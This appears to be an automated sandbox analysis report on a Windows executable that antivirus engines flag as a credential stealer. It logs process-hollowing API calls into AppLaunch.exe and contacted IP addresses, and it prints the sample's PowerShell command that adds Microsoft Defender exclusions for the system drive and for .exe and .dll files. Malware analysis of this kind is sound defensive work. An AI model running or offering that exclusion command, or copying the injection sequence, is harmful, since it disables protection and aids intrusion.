NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 4 (PAGE_READWRITE) base_address: 0x0051c000 process_handle: 0x000000c8	1	0	0
NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 2 (PAGE_READONLY) base_address: 0x00521000 process_handle: 0x000000c8	1	0	0
NtProtectVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 2 (PAGE_READONLY) base_address: 0x00522000 process_handle: 0x000000c8	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2084 injected into non-child 2192
WriteProcessMemory July 31, 2023, 5:28 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2192 process_handle: 0x000000c8	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2084 called NtSetContextThread to modify thread in remote process 2192
NtSetContextThread July 31, 2023, 5:28 p.m.	registers.eip: 2005598660 registers.esp: 3799672 registers.edi: 0 registers.eax: 4732019 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000002c process_identifier: 2192	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
parent_process	powershell.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2084 resumed a thread in remote process 2192
NtResumeThread July 31, 2023, 5:28 p.m.	thread_handle: 0x0000002c suspend_count: 1 process_identifier: 2192	1	0	0

Executed a process and injected code into it, probably while unpacking (17 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW July 31, 2023, 5:28 p.m.	thread_identifier: 2196 thread_handle: 0x0000002c process_identifier: 2192 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000c8	1	1
NtGetContextThread July 31, 2023, 5:28 p.m.	thread_handle: 0x0000002c	1	0
NtAllocateVirtualMemory July 31, 2023, 5:28 p.m.	process_identifier: 2192 region_size: 1208320 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000c8	1	0
WriteProcessMemory July 31, 2023, 5:28 p.m.	buffer: base_address: 0x00400000 process_identifier: 2192 process_handle: 0x000000c8	1	1
WriteProcessMemory July 31, 2023, 5:28 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2192 process_handle: 0x000000c8	1	1
NtSetContextThread July 31, 2023, 5:28 p.m.	registers.eip: 2005598660 registers.esp: 3799672 registers.edi: 0 registers.eax: 4732019 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000002c process_identifier: 2192	1	0
NtResumeThread July 31, 2023, 5:28 p.m.	thread_handle: 0x0000002c suspend_count: 1 process_identifier: 2192	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x000002cc suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x00000320 suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x0000046c suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x00000480 suspend_count: 1 process_identifier: 2800	1	0
CreateProcessInternalW July 31, 2023, 5:29 p.m.	thread_identifier: 2932 thread_handle: 0x000004fc process_identifier: 2928 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004f4	1	1
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x00000520 suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x000002d0 suspend_count: 1 process_identifier: 2928	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x00000324 suspend_count: 1 process_identifier: 2928	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x00000468 suspend_count: 1 process_identifier: 2928	1	0
NtResumeThread July 31, 2023, 5:29 p.m.	thread_handle: 0x000004c8 suspend_count: 1 process_identifier: 2928	1	0

File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Stealer.12!c
Elastic	malicious (high confidence)
DrWeb	Trojan.DownLoader45.63382
MicroWorld-eScan	Trojan.GenericKD.68369537
FireEye	Generic.mg.2eb21acbab653f90
CAT-QuickHeal	TrojanSpy.Stealer
McAfee	Artemis!2EB21ACBAB65
Malwarebytes	Trojan.Crypt
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005a93021 )
Alibaba	TrojanSpy:Win32/Stealer.0c4d13ef
K7GW	Trojan ( 005a93021 )
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Generic.D4133C81
BitDefenderTheta	AI:Packer.4E557A0A1D
VirIT	Trojan.Win32.Genus.SJD
Cyren	W32/ABTrojan.RIEV-7890
Symantec	Trojan.Whispergate
ESET-NOD32	a variant of Win32/GenKryptik.GMGP
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Spy.Win32.Stealer.gen
BitDefender	Trojan.GenericKD.68369537
NANO-Antivirus	Trojan.Win32.Stealer.jxpmxn
Avast	Win32:PWSX-gen [Trj]
Tencent	Malware.Win32.Gencirc.10bf0e0b
Sophos	Mal/Generic-S
VIPRE	Trojan.GenericKD.68369537
McAfee-GW-Edition	BehavesLike.Win32.Generic.wz
Trapmine	malicious.high.ml.score
Emsisoft	Trojan.GenericKD.68369537 (B)
Webroot	W32.Trojan.Gen
Antiy-AVL	Trojan/Win32.Sabsik
Gridinsoft	Trojan.Heur!.02092021
Xcitium	Malware@#2gtiotiewmcc
Microsoft	Trojan:Win32/Redline.GNS!MTB
ZoneAlarm	HEUR:Trojan-Spy.Win32.Stealer.gen
GData	Trojan.GenericKD.68369537
Google	Detected
AhnLab-V3	Malware/Win.Injector.C5462112
VBA32	BScope.TrojanPSW.RedLine
ALYac	Trojan.GenericKD.68369537
MAX	malware (ai score=88)
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H09GQ23
Rising	Trojan.Generic@AI.100 (RDML:TwpUDTHxJ+B8pA4e7LekxQ)
Yandex	Trojan.GenKryptik!O7swy7lEpns
Ikarus	Trojan.Win32.Krypt

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	185.159.129.168:80
dead_host	185.149.146.118:80
dead_host	192.168.56.103:49167
dead_host	77.91.77.144:80

zdkecjb7.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All